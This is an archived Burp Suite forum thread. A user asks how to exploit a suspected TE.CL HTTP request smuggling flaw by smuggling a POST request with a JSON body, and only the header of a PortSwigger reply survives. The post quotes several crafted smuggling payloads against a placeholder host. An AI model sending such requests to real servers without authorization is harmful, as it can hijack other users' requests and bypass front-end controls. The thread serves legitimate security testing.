The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

HTTP Request Smuggling POST Request with Body

Wyatt | Last updated: May 28, 2020 04:25PM UTC

Hi Portswigger Team, I have identified a potential TE.CL HTTP Request Smuggling vulnerability through Burpsuite's scanner and can verify it with the HTTP Request Smuggler extension. I'm having difficulty exploiting it and am looking for guidance on how to smuggle my POST data in a request. The example online (https://portswigger.net/web-security/request-smuggling) shows a POST request without a body being sent: POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 3 Transfer-Encoding: chunked 8 SMUGGLED 0 -- The differential response portion starts with a POST request without a body and then smuggles a GET request: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 144 x= 0 -- I'm struggling to create a proof of concept where two POST requests with data are sent, where each have a body. The HTTP Request Smuggler identifies two requests that are subject to smuggling: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 23 Transfer-Encoding: chunked d {"foo":"bar"} 0 --- And POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 24 Transfer-Encoding: chunked d {"foo":"bar"} 0 X -- This format indicates to me that this is TE.CL. When I click Smuggle Attack (TE.CL) on the request, the turbo intruder payload will replace '0\r\n\r\n' with the hexadecimal size of the smuggled request plus the prefix and then finally '\r\n0\r\n\r\n'. For example if I want to smuggle the following request my prefix variable is set to: '''POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 13 {"foo":"foo"}''' This ends up creating an attack request that looks like the following: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-length: 22 Transfer-Encoding: chunked d {"foo":"bar"} 78 POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 13 {"foo":"foo"} 0 --- My expectation is that if request smuggling works is that one of the poisoned responses would return the data for {"foo":"foo"} instead of {"foo":"bar"}. I'm unfortunately getting a 400 response when I try to send data along with an additional POST request with data. Is it possible to smuggle POST data along with an additional POST request? Are my content-length or chunked count's incorrect?

Michelle, PortSwigger Agent | Last updated: May 29, 2020 08:10AM UTC